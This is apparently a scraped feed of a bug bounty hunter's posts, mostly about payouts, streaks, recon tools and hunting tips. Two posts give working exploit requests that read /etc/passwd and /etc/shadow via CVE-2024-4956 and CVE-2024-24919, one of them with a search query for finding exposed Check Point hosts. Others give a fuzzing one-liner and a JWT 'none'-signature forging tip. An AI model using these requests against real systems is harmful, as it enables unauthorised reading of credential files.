Security Engineer !| Bug bounty hunter !| Pentester | whitehat @Immunefi | bugcrowd | hackerone | @Hackenproof Security Researcher

I earned $10000 for my submission on @bugcrowd bugcrowd.com/xitsec #ItTakesACrowd #bugbounty Posting this late 💬
49
12
555
20,211
Starting the quarter with this and in addition 2.7K$ From the other platform combining = 17,144$ :) I know this is normal for some people , but still new achievement for me #bugbounty
39
10
457
35,160
Now i can sleep peacefully 😴 ! #bugbounty
15
5
375
51,960
Gods plan :) #bugbounty Rewarded 7500$ For a critical , can't ignore the fact that the program was so fast , i was able to verify the patch within i hours !
Part of the process:)
21
7
326
18,865
All pending vulnerabilities submitted between these 10 days are paid . Total till is 13k$ ++ :) #BugBounty
Lets start the grind. this month not much bounties kinda feeling low but I am going to start a 10 days intense bug bounty challenge and i will do it alone no discord this time . Only 10 days because after that i need to do another challenge But will update here! #BugBounty
24
10
292
27,104
Looks liks vps is paying off ! #BugBounty
12
5
275
15,547
Easy P2,p3 bug methodology to find sqli, xss and injection attacks 1. waybackurls target.com | grep = | tee param.txt git clone = github.com/projectdiscovery/… 2. cat param.txt | nuclei -t fuzzing-templates #bugbounty #bugbountytips #bugcrwod
4
56
260
14,863
Choose A program for me from the list ! I will hunt on it ! And will post bounty within a week! #BugBounty #hackerone @Hacker0x01
79
10
250
47,210
Admin privilege takeover ! Priority = P1 $4100 #bugbounty
17
5
231
15,152
I just found a bug and got paid 2000$ on @immunefi #immunefitribe immunefi.com/s/ss/?severity=… #bugbounty
24
13
225
18,826
Last 2 days of the month , added 2000$ for 4 bugs in the bucket, Great month for me . Honestly Total 15k$ + in bounties in may :) Grateful for this #bugbounty
All pending vulnerabilities submitted between these 10 days are paid . Total till is 13k$ ++ :) #BugBounty
8
6
214
10,618
Vulnerability so good that the team also gets impressed Start of month with 1750$ + 250$ #bugbounty
5
6
211
9,462
Cve = CVE-2024-4956 assigned to Unauthenticated Path Traversal at Nexus Repository Manager 3 Vulnerable path = /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd POC at = github.com/vulhub/vulhub/tre…
3
31
193
12,089
Reported, triaged ,rewarded in a single day(24 hours) #BugBounty
8
5
174
13,037
The Challenge was good for me ! Till now in 9 days it profited me with this ! #bugbounty Some 💵 more from hackerone , and total is 6k$ + Peace :)
Lets start the grind. this month not much bounties kinda feeling low but I am going to start a 10 days intense bug bounty challenge and i will do it alone no discord this time . Only 10 days because after that i need to do another challenge But will update here! #BugBounty
15
5
174
16,539
Combining with yesterday bounties its almost approx 19k now ! My August goal is also similiar, lets see if i can achieve that :) Most of the valid bugs in july i submitted were criticals !
Starting the quarter with this and in addition 2.7K$ From the other platform combining = 17,144$ :) I know this is normal for some people , but still new achievement for me #bugbounty
11
4
171
9,252
I earned $5,500 for my submission on @bugcrowd bugcrowd.com/xitsec #ItTakesACrowd
13
1
154
4,740
P4 king ? 🥲 #bugbounty #bugcrowd
12
1
143
12,101
How does it feels from there ! @codecancare #bugbounty #bugcrowd @Bugcrowd
4
147
13,170
Hii @MtnBer You are insane 🔥🫶! What did you actually looks for client side Bugs ? @MtnBer #bugbounty
3
6
139
11,322
Tip = Always Check js files manually- Not Automation #BugBounty #bugbountytips @Bugcrowd
7
4
136
6,177
Manual testing 🫶❤️! #bugbounty
11
1
131
6,828
Nice week 1 P1 , 1 P2 , 2 P3 #bugbounty #bugcrowd
10
132
6,319
How?😂
21
4
130
18,836
Just ,Got my first cve assigned !
12
1
137
5,879
Slowly getting back! #bugbounty @Hacker0x01
9
1
126
9,015
Quick thing * you can decode jwt and then generate with none signature at - xitsec.in/jwt.html
4
14
132
6,901
Last Friday , I was bored , and randomly Find a Lucky program from= sacsecurity.tech/lbfinder.ht…, And got $400 bounty #BugBounty
1
8
128
4,732
I again saw someone today selling a bug bounty course for 8k rupees 🤧 with having 0 valid bugs in his profile 😂 !
24
2
127
11,605
I earned $750 for my submission on @bugcrowd bugcrowd.com/xitsec #ItTakesACrowd #bugbounty
1
1
124
5,466
Yay, I was awarded a $1,000 bounty on @Hacker0x01! #TogetherWeHitHarder #bugbounty #hackerone
5
1
121
5,585
Part of the process:)
9
1
120
25,359
Hi guys, Today I was confused 🤔 about which program to choose for hunting, but then I got an idea 💡 and used this: sacsecurity.tech/lbfinder.ht… to find a lucky program 🍀 for me. Turns out, I got a valid finding! 🎯 #bugbounty , Use it and let me know you experience!
5
11
124
12,165
Such A great Collab Going On with @janlele91 #bugbounty
6
1
111
5,573
I caught triager using chatgpt or a template to response 🤣! #bugbounty
16
3
115
8,594
I earned $175 for my submission on @bugcrowd bugcrowd.com/xitsec #ItTakesACrowd Such a nice program . Drop a heart❤️ for this program manager ! he deserves it .
6
1
107
5,422
Back to home = bugcrowd. @Bugcrowd ❤️ ! #bugbounty
13
1
107
6,098
Manage to complete the 13 months streak ! #bugbounty
2
1
109
3,708
🚀 Introducing JSBerg – A blazing-fast URL scraper! github.com/xitmakes/jsberg 🔍 Extracts: ✅ Links from <a>, <script>, <link>, and <img> tags ✅ Inline URLs from JS & CSS ✅ Redirected URLs ⚡ Multi-threaded for speed! 🔗 Grab it now: [GitHub Repo Link] #Python #bugbounty
1
19
105
7,514
I created a tool called "jstee" which helps in scraping JavaScript file links from a list of hosts. I hope you like it! 🚀 install it with: go install -v github.com/xitmakes/jstee/cm… Check it out here: github.com/xitmakes/jstee #BugBounty #GoLang #CyberSecurity #JSRecon
1
21
93
5,800
Almost a year of not using social media(instagram..), and life feels chill . * Bad side is people will start forgetting you and your birthday also 😂, only real freinds remember that * But You know the crazy thing , There are no real freinds :)
16
2
95
6,984
I installed kali linux as a dual boot for bug bounty purpose ! Is it worth it? #bugbounty Accidently installed it on C drive🥲!
37
1
88
22,635
Tip : If you are not able to find bug with recon ! Just hunt on main App! Recon is not necessary! #BugBounty #bugbountytips #bugbounty #bugcrowd @Bugcrowd
12
84
6,405
Just got that 14th streak light up ! #bugbounty #hackerone
1
1
91
3,373
Oops 😶 really ? Is he the number 1 ethical hacker of the world?
16
1
85
17,656
I dont know why i like Hunting on public programs ! Even having a lot of private programs ! #bugbounty
10
2
83
6,687
Final exams from tommorow ! Can't hunt more this Month 🤧 ! #bugbounty
7
1
88
5,406
CVE-2024-24919 :- allow attacker to read info on check point and remote acess Just make a post request to your target POST /clients/MyCRL HTTP/1.1 host: target Content-Length: 39 aCSHELL/../../../../../../../etc/shadow --------- FOFA Query: app="Check_Point-SSL-Network-Extender"
3
21
79
6,355
HUGE BOUNTY AFTER 2 YEARS 😂🥰 #bugbounty Atleast they paid , i didn't thought they will
4
2
77
8,318
I earned $300 for my submission on @bugcrowd bugcrowd.com/xitsec #ItTakesACrowd #bugbounty Got bounty from atlassian thankyou all who supported! 🙏🫂❤️
5
74
4,254
Let me guess you wakeup every morning and checks mail first ? Welcome to bug bounty 🫂😂 #BugBounty
15
2
79
4,169
Hai is my new hacking buddy 💪
2
2
78
5,889
Why to waste Time when I can hunt on bugcrowd☺️! @Bugcrowd #bug #bugbounty #bugcrowd
3
70
6,200
Excited to share that I won the bugcrowd @Bugcrowd bug boss fighter game . Thanks link clark for the great competition. 😊 #bugbounty
11
1
77
3,346
I earned $500 for my submission on @bugcrowd #ItTakesACrowd #bugbounty
6
1
73
2,979
Usually i hunt on public on h1 , this is was a nice bug👌 and will try to provide value and stay consitent to this new program i chose Attack complexity was high here , but fair enough #bugbounty
2
74
9,126
This one liner fetches all the h1 programs scope , I created this oneliner manually and i does not needs any keys , will release it soon , however it may fetching some svg files i dont know why , but i found it faster that bbscope tool , so i am using my own oneliner. #BugBounty
4
5
71
4,317
I Reported 6 valid Bugs to Auth0 ! Almost all the triage but 4 of them are externally tracked duplicate sumission! And 2 are internally Duplicate! What's your thoughts on this? Externally duplicate thing ! #BugBounty #bugbounty
5
71
5,940
Btw way a great resource for bash recon is 1. tomnomnom.com/talks/bash-bug… 2. tomnomnom.com/talks/passivei… Thank me later when you will hit bounty 😂
Have you ever tried bash recon? last month i made some $$$ just from terminal. The unique thing when doing recon is recon can have of different types , intercepting traffic is also can be some one's initial recon , some may use shodan to start recon #bugbounty
2
9
70
6,448
Yeay, I was 100$ awarded for a valid submission on @HackenProof hackenproof.com/ #hackenproofed #bugbounty #hackenproof small bounty 😁
4
3
72
3,118
💯 % agreed . Bugbounty is not a skill that you can achieve with any type of certification . It needs real skills and time . Not even with the so called professional certificate! #bugbounty
3
7
75
2,978
I believe that these small challenges increases the productivity , and thinking of the next challenge what should i do next ? Maybe try to hit the leaderboard? #bugbounty
The Challenge was good for me ! Till now in 9 days it profited me with this ! #bugbounty Some 💵 more from hackerone , and total is 6k$ + Peace :)
3
72
4,080
Weird response:- 🙄 Tier 1 asset is not eligible for bounty! Wow #BugBounty
11
2
76
8,551
Lol , Some people may dislike this post ! Not targeting anyone particularly - More followers doesn't define that the particular person has more knowledge - in this bug bounty field you will find a lot of accounts like that with zero knowledge but thousands of followers
11
1
74
5,441
She: Breakup Hurts The Most Me : Really? 🥲🫶 #bugbounty @Bugcrowd
3
63
4,267
Got first bounty on @yeswehack platform ! Excited to hunt there more ! #bugbounty
4
2
68
3,993
Another triage on microsoft! #bugbounty
5
65
4,892
Going back to hunt on hackerone regularly for some reasons . Hope so that 12 month streak also lights up. 😇 #BugBounty
1
2
67
2,732
Just received the clear background check invitation. Feels great ! #hackerone #bugbounty
1
1
68
2,980
Yeay, I was $$$ awarded for a valid submission on @HackenProof hackenproof.com #hackenproofed #bugbounty #hackenproof
2
4
60
3,526
Found an interesting issue while testing a banking program 🤔 Let's say the domain is xitsec.in. Visiting bank-foo.xitsec.in/reset-pas… leaks the email in JSON! 🚨 Triager says it’s P5 since a username is needed—bug or not? #BugBounty #Infosec"**
11
1
62
9,602
I created a tool to fetch scope of public h1 programs , This was just a one line code but very much useful and time saving . #bugbounty
5
1
60
6,969
"🚀 Looking to find subdomains quickly? 🔍 Check out sacsecurity.tech/sbfinder.ht… — super fast and easy to use! 💻 #CyberSecurity #SubdomainFinder #bugbounty"
13
59
2,903
I earned $$$ for my submission on @bugcrowd bugcrowd.com/xitsec #ItTakesACrowd
1
2
61
3,394
I got a bounty this month. And thought that the November streak has completed. But when i saw the profile i found that the bug was validated on October and paid on November so the November streak have not count.
1
57
4,094
Tip:Have you ever tried taking over a chatbot😂? @NahamSec @ADITYASHENDE17 @Bugcrowd @GodfatherOrwa ##bugbountytip #bugbounty
11
3
57
6,236
Exams ahead, i need to pause this challenge * However in 15 days the only leaderboard i made to is LinkedIn 2025 , with 95 rep :) Will continue the challenge after my exams end #bugbounty
Now in April i will try this leaderboard challenge ! Really don't know which leaderboard i will target , but as far from the advices i am getting that we need to be consistent and keep submitting . I will try that and will try to be consistent ! Let see where it goes:)
2
3
59
5,685
Same program (public) Validated by favourite triager #bugbounty
Usually i hunt on public on h1 , this is was a nice bug👌 and will try to provide value and stay consitent to this new program i chose Attack complexity was high here , but fair enough #bugbounty
4
58
5,389